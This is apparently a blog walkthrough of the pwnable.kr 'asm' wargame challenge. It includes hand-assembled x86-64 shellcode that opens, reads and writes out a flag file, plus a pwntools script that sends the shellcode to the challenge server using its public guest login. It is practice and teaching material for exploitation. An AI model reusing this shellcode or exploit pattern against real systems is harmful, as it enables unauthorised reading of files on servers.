Pwning in Linux
ASM - Making your Own ASM Shellcode for open/read/write remote file on server
theFaunia in the wild 2019. 2. 28. 16:08 · ASM
1.1 Generate Shellcode
naivenom@kali:/opt/shellme$ objdump -d ./test|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
Compilar una shellcode escrita en asm (ensamblar y enlazar):
# Assemble the source as a 64-bit ELF object.
sudo nasm -f elf64 -o test.o test.asm
# Link it bare: no startup files and no libc (the code does raw syscalls only),
# -z noexecstack marks the stack non-executable, -s strips symbols.
# NOTE(review): sudo should not be needed for nasm/ld in a user-writable directory.
sudo ld -nostartfiles -nostdlib -z noexecstack -m elf_x86_64 -s -o test test.o
1.2 Writing your ASM Code
asm
BITS 64
global _start
; Shellcode written from scratch. Syscall numbers follow the Linux x86-64
; system call table:
; https://blog.rchapman.org/posts/Linux_System_Call_Table_for_x86_64/
;
; Flow: open(path, 0, 0) -> read(fd, rsp, 0x40) -> write(1, rsp, n) -> exit
; The path string is stored after the code (label `filename`); the
; jmp / call / pop pair loads its address into rdi without needing an
; absolute address, so the code is position independent.
_start:
jmp filename                    ; forward jump to the call that pushes the string address
_open:
pop rdi                         ; rdi = address of the path string (the return address pushed by `call _open`)
xor rsi, rsi                    ; flags = 0 (O_RDONLY)
xor rdx, rdx                    ; mode = 0 (only meaningful with O_CREAT)
mov rax, 2                      ; 0x2 = sys_open
syscall                         ; rax = fd on success, -errno on failure (not checked here)
; syscall read
mov rdi, rax                    ; fd: return value of the previous syscall
mov rdx, 0x40                   ; count: number of bytes to read
mov rsi, rsp                    ; buffer: read straight onto the stack at rsp
xor rax, rax                    ; rax = 0 = sys_read
syscall                         ; rax = bytes read (or -errno; not checked)
; syscall write to stdout
mov rdx, rax                    ; count = return value of read = number of bytes read
; mov rsi, rsp -- not needed: rsi still holds the buffer address set before the read
mov rdi, 0x1                    ; fd 0x1 --> STDOUT_FILENO
mov rax, 0x1                    ; 0x1 = sys_write
syscall
mov rax, 0x3c                   ; 0x3c = sys_exit; rdi is still 1 from the write, so the exit status is 1
syscall
filename:
call _open                      ; pushes the address of the string below (its return address) and jumps back to _open
; NUL-terminated path. The trailing 0 and the 32-bit immediates above encode 0x00 bytes,
; which presumably is why the remote variant (section 1.4) builds the path on the stack instead.
db "this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong",0
1.3 PoC Local file
naivenom@kali:~/pwnable/asm$ cat this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong
HOLAAA
naivenom@kali:~/pwnable/asm$ ./shellcode_final
HOLAAA
1.4 Writing your ASM Code for pwning remote server
asm
bits 64
section .text
global _start
; Stack-built variant of the open/read/write shellcode.
; The path is pushed onto the stack in 8-byte chunks, last chunk first
; (after a 0 qword that acts as the NUL terminator), so that when the
; pushes are done rsp points at the start of the string. Each immediate
; is the little-endian encoding of 8 path characters.
;
; Flow: open(rsp, 0, 0) -> read(fd, rsp, 0xc8) -> write(1, rsp, n)
; Note there is no exit syscall: execution falls through after the last
; syscall, so what happens next depends on the code that follows in the
; host process.
_start:
xor rsi, rsi                    ; rsi = 0: open flags (O_RDONLY), also used as the terminator below
xor rdx, rdx                    ; rdx = 0: open mode
push rsi                        ; 8 zero bytes = NUL terminator of the path
mov rax, 0x676e6f306f306f30     ; "0o0o0ong" -- last 8 characters of the name
push rax
mov rax, 0x6f306f306f306f30
push rax
mov rax, 0x3030303030303030
push rax
mov rax, 0x3030306f6f6f6f6f
push rax
mov rax, 0x6f6f6f6f6f6f6f6f
push rax
mov rax, 0x6f6f6f6f6f6f6f6f
push rax
mov rax, 0x6f6f303030303030
push rax
mov rax, 0x3030303030303030
push rax
mov rax, 0x3030303030303030
push rax
mov rax, 0x3030306f6f6f6f6f
push rax
mov rax, 0x6f6f6f6f6f6f6f6f
push rax
mov rax, 0x6f6f6f6f6f6f6f6f
push rax
mov rax, 0x6f6f6f6f6f6f6f6f
push rax
mov rax, 0x6f6f6f6f6f6f6f6f
push rax
mov rax, 0x6f6f6f6f6f6f6f6f
push rax
mov rax, 0x6f6f6f6f6f6f6f6f
push rax
mov rax, 0x6f6f6f6f6f6f6f6f
push rax
mov rax, 0x6f6f6f6f6f6f6f6f
push rax
mov rax, 0x6f6f6f6f6f6f6f6c     ; "looooooo"
push rax
mov rax, 0x5f797265765f7369     ; "is_very_"
push rax
mov rax, 0x5f656d616e5f656c
push rax
mov rax, 0x69665f6568745f79
push rax
mov rax, 0x72726f732e656c69
push rax
mov rax, 0x665f736968745f64
push rax
mov rax, 0x6165725f65736165
push rax
mov rax, 0x6c705f656c69665f
push rax
mov rax, 0x67616c665f726b2e     ; ".kr_flag"
push rax
mov rax, 0x656c62616e77705f     ; "_pwnable"
push rax
mov rax, 0x73695f736968742f     ; "/this_is"
push rax
mov rax, 0x2f2f2f2f2f2f2f2e     ; ".///////": the extra slashes pad the path to a multiple of 8 so no NUL byte is needed inside the string; repeated slashes are harmless in path lookup
push rax
mov rdi, rsp                    ; rdi = start of the path string on the stack
mov rax, 0x2                    ; 0x2 = sys_open(path, 0, 0)
syscall                         ; rax = fd, or -errno on failure (not checked; a failed open makes the read/write below fail too)
mov rbx, rax                    ; keep the fd while the other registers are set up
mov rdx, 0xc8                   ; count = 200 bytes
mov rsi, rdi                    ; buffer = rsp: the path bytes are reused as the read buffer (safe, the file is already open)
mov rdi, rbx                    ; fd
xor rax, rax                    ; rax = 0 = sys_read
syscall                         ; rax = bytes read (or -errno; not checked)
mov rdx, rax                    ; count = bytes read
mov rsi, rsp                    ; buffer = same stack address the read filled
mov rdi, 0x1                    ; fd 1 = stdout
mov rax, 0x1                    ; 0x1 = sys_write
syscall
1.5 Exploit remote server
#!/usr/bin/env python # -*- coding: utf-8 -*- from pwn import * context.update(arch="amd64", os="linux", bits=64) r = ssh(host="pwnable.kr", port=2222, user="asm", password="guest") p = r.connect_remote("localhost", 9026) shellcode = asm(""" xor rsi, rsi xor rdx, rdx push rsi mov rax, 0x676e6f306f306f30 push rax mov rax, 0x6f306f306f306f30 push rax mov rax, 0x3030303030303030 push rax mov rax, 0x3030306f6f6f6f6f push rax mov rax, 0x6f6f6f6f6f6f6f6f push rax mov rax, 0x6f6f6f6f6f6f6f6f push rax mov rax, 0x6f6f303030303030 push rax mov rax, 0x3030303030303030 push rax mov rax, 0x3030303030303030 push rax mov rax, 0x3030306f6f6f6f6f push rax mov rax, 0x6f6f6f6f6f6f6f6f push rax mov rax, 0x6f6f6f6f6f6f6f6f push rax mov rax, 0x6f6f6f6f6f6f6f6f push rax mov rax, 0x6f6f6f6f6f6f6f6f push rax mov rax, 0x6f6f6f6f6f6f6f6f push rax mov rax, 0x6f6f6f6f6f6f6f6f push rax mov rax, 0x6f6f6f6f6f6f6f6f push rax mov rax, 0x6f6f6f6f6f6f6f6f push rax mov rax, 0x6f6f6f6f6f6f6f6c push rax mov rax, 0x5f797265765f7369 push rax mov rax, 0x5f656d616e5f656c push rax mov rax, 0x69665f6568745f79 push rax mov rax, 0x72726f732e656c69 push rax mov rax, 0x665f736968745f64 push rax mov rax, 0x6165725f65736165 push rax mov rax, 0x6c705f656c69665f push rax mov rax, 0x67616c665f726b2e push rax mov rax, 0x656c62616e77705f push rax mov rax, 0x73695f736968742f push rax mov rax, 0x2f2f2f2f2f2f2f2e push rax mov rdi, rsp mov rax, 0x2 syscall mov rbx, rax mov rdx, 0xc8 mov rsi, rdi mov rdi, rbx xor rax, rax syscall mov rdx, rax mov rsi, rsp mov rdi, 0x1 mov rax, 0x1 syscall """) p.recvuntil("give me your x64 shellcode:") p.send(shellcode) p.interactive() p.close()
1.6 PoC Remote Exploitation
naivenom@kali:~/pwnable/asm$ python exploit2.py
[+] Connecting to pwnable.kr on port 2222: Done
[*] asm@pwnable.kr:
Distro Ubuntu 16.04
OS: linux
Arch: amd64
Version: 4.10.0
ASLR: Enabled
[+] Connecting to localhost:9026 via SSH to pwnable.kr: Done
[*] Switching to interactive mode
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
[*] Got EOF while reading in interactive
$